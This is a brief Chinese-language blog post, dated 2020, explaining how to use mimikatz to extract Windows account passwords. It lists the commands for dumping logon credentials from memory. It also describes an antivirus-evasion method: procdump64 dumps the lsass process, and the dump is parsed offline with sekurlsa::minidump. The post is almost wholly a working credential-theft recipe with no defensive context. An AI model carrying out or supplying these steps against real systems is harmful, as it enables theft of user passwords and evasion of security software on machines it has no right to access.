mimikatz使用方法

发布于 2020-03-19  577 次阅读


0x01 前言

mimikatz是Windows平台下的一款神器,它具备很多强大功能。最常用的还是获取账户的密码,使用时区分32位和64位 下载地址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200308-1

0x02 使用方法

#日志记录所有操作
log
#获取用户密码
privilege::debug
sekurlsa::logonpasswords

0x03 杀软对抗

procdump64 是微软官方出的一款工具, 杀软在牛皮也不能杀微软官方的软件吧。因为用户登录的数据存放在 lsass 进程中,我们可以使用procdump先导出lsass信息。把lsass.dmp文件下载到本地。使用mimikatz读取lsass.dmp,列出用户的账号密码

0x04 导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

0x05 列出账号密码

sekurlsa::minidump lsass.dmp
log
sekurlsa::logonPasswords full


我不懂世界到底在热闹些什么